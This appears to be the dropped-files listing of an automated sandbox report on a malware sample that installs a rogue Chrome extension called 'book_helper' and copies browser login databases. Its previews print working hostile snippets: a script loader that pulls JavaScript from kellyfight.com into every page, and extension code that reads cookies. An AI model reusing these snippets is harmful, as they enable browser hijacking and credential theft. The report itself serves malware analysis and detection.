Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.039480985438208
Encrypted:	false
SSDEEP:	3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
MD5:	30CBBF4DF66B87924C75750240618648
SHA1:	64AF3DD53D6DED500863387E407F876C89A29B9A
SHA-256:	D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
SHA-512:	8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
Malicious:	false
Preview:	(function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon.png Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1161
Entropy (8bit):	7.79271055262892
Encrypted:	false
SSDEEP:	24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
MD5:	5D207F5A21E55E47FCCD8EF947A023AE
SHA1:	3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
SHA-256:	4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
SHA-512:	38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
Malicious:	false
Preview:	.PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..\|z.Z_..b$...)...z.....\|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r]...... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:.......k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u\|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon48.png Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2235
Entropy (8bit):	7.880518016071819
Encrypted:	false
SSDEEP:	48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
MD5:	E35B805293CCD4F74377E9959C35427D
SHA1:	9755C6F8BAB51BD40BD6A51D73BE2570605635D1
SHA-256:	2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
SHA-512:	6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
Malicious:	false
Preview:	.PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O..!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B ..dh)...l.:\|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...\|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR\|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.\|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....\|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\jquery-1.8.3.min.js Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	93637
Entropy (8bit):	5.292996107428883
Encrypted:	false
SSDEEP:	1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
MD5:	E1288116312E4728F98923C79B034B67
SHA1:	8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
SHA-256:	BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
SHA-512:	BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
Malicious:	false
Preview:	/! jQuery v1.8.3 jquery.com \| jquery.org/license /..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e\|\|!e.parentNode\|\|e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t\|\|0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\manifest.json Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2380
Entropy (8bit):	5.687293760500434
Encrypted:	false
SSDEEP:	48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
MD5:	ADF10776EEC8DC0F6E7E3B4AD59CF504
SHA1:	4F11FE569189036B42923EF5A8AFB0985DCECDF5
SHA-256:	ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
SHA-512:	7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
Malicious:	false
Preview:	{.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http:///", "https:///" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.html Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	280
Entropy (8bit):	5.048307538221611
Encrypted:	false
SSDEEP:	6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
MD5:	E93B02D6CFFCCA037F3EA55DC70EE969
SHA1:	DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
SHA-256:	B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
SHA-512:	F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
Malicious:	false
Preview:	<!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.js Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	642
Entropy (8bit):	4.985939227199713
Encrypted:	false
SSDEEP:	12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
MD5:	2AC02EE5F808BC4DEB832FB8E7F6F352
SHA1:	05375EF86FF516D91FB9746C0CBC46D2318BEB86
SHA-256:	DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
SHA-512:	6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
Malicious:	false
Preview:	$(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	5361
Entropy (8bit):	5.184927901937767
Encrypted:	false
SSDEEP:	96:nYrRT/Xrspi863rI4+V7Sk0JCKL8xF7bOEQVuwv:nYrd/t863r3+9U4Kh
MD5:	01D789546E2AEAF9881380C4EE5C4DD6
SHA1:	01A9B24C8198BD661A402EDDBA0BABB1E54CAC66
SHA-256:	2A5E7EF1FC6E72B9AFC0EC0D30E67538637DACA82EBCC6061CB075471CF3D857
SHA-512:	ACAD5D062D1B1A018488261D1C2EDEE61AC87263FEDA15A870D6F2B4CF61EF8E3A0E7948B31A743FDA046FFDEFCEE845FA3AA2ACE2F49BCA5A7AB1297E68A9B7
Malicious:	true
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13245950583460399","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245950583260338","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245950640095768","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1538886"],"daily_received_length":["0","0","0","0","0","0","0",

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	dropped
Size (bytes):	34636
Entropy (8bit):	5.539146915923536
Encrypted:	false
SSDEEP:	768:nEaf7DBUckPWFr+oXLl6y1kXqKf/pUZNCgVLH2HfjrUkGfnM6vJ:lthLvjfnh
MD5:	B8D78BF78F0834F84BF726D40FB0EEBD
SHA1:	DDD88DAA574A84985BFC291F64065184396230AD
SHA-256:	E039E1C07D325F0F6BF7D29195E9BC54F38D95CB0D3A6472AD7649B6787CC59B
SHA-512:	99A39DB5F25FD7A9226C36A29F5EFF234E79B17C20603D4A3C1F6814E11DB7162DEFCB0414B0ACE7B6162122FBF88E7444D11096F3BE8BC7F1B8486762BDF34C
Malicious:	true
Preview:	{"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245950593233950","lastpingday":"13245947458518717","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m

C:\Users\user\AppData\Local\Login Data1611970726180 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Login Data1611970737242 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1611970728399 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	37737
Entropy (8bit):	7.994967159065528
Encrypted:	true
SSDEEP:	768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
MD5:	5A6469A3F787ABD2AE93B47470528F79
SHA1:	4032B59237CC883FB752D9727971B435F4D27EB8
SHA-256:	1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
SHA-512:	335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
Malicious:	false
Preview:	7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......\|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\.....f.q.=..t...).<\|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...\|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....\|..^.+RP]...D.jq.z'..4.\|I*......jq..w.%..2/\|.....>..y...>......C.)8B7$Z...{P.~..&...b..........

C:\Users\user\AppData\Local\Temp\1611970730398 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	553040
Entropy (8bit):	7.999671101282436
Encrypted:	true
SSDEEP:	12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
MD5:	A4427F2F46DEEA15CEA87BDBB53A22CC
SHA1:	158501079514868D85246E970314A024FF263199
SHA-256:	18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
SHA-512:	334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
Malicious:	false
Preview:	7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A):..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.Y..'....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA.2...O......\|....Drrl)..7..9.....pNj.P6\|].t .'.\|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9

C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Download File
Process:	C:\Users\user\Desktop\N1yprTBBXs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4999496
Entropy (8bit):	7.663640140797365
Encrypted:	false
SSDEEP:	98304:LWrSa24w3rQ/pE/JFBCnpcYiKAEXXPnsNSkUe:iy4wesJFqpc8dXfUSe
MD5:	F7D7C89F3F5CBC925480B46B7B934157
SHA1:	73E389B70CF3D8975CCBAF7D04F4C45CC80BE860
SHA-256:	2870F899F2E9EC540DA321F603CFB1A735DCD06DF016718E663DC78FEFDF5E0A
SHA-512:	9B972E2954C18F706A6F8012A6B76E1F4CE8E76466EAE919B55A6225C4F8574586D9F11838D8D63BDD245B11CFD3E581248E9A578F72FF2DD8B6623BEBC525EB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 22%, Browse Antivirus: ReversingLabs, Detection: 59%
Joe Sandbox View:	Filename: N1yprTBBXs.exe, Detection: malicious, Browse
Preview:	MZ......................@............................................H.....L.!This program cannot be run in DOS mode....$............._..._..._.E_..._..v_..._.Wp_..._.WD__.._.WE_..._..m_..._..}_..._..._H.._.WA_Q.._.Wt_..._.Ws_..._Rich..._........PE..L......S..........................................@..................................Z....@..................................e..\|.... ..................H.... ..........................................@...............<............................text............................... ....rdata..xy.......z..................@..@.data...,........V...\|..............@....rsrc........ ......................@..@.reloc..2.... ......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6272167835D47591.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\N1yprTBBXs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\MSI1983.tmp Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.2861874904617645
Encrypted:	false
SSDEEP:	96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
MD5:	84878B1A26F8544BDA4E069320AD8E7D
SHA1:	51C6EE244F5F2FA35B563BFFB91E37DA848A759C
SHA-256:	809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
SHA-512:	4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	268744
Entropy (8bit):	5.398284390686728
Encrypted:	false
SSDEEP:	6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5:	E2E9483568DC53F68BE0B80C34FE27FB
SHA1:	8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256:	205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512:	B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73160
Entropy (8bit):	6.49500452335621
Encrypted:	false
SSDEEP:	1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5:	F0372FF8A6148498B19E04203DBB9E69
SHA1:	27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256:	298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512:	65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...\|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\atl71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	6.46929682960805
Encrypted:	false
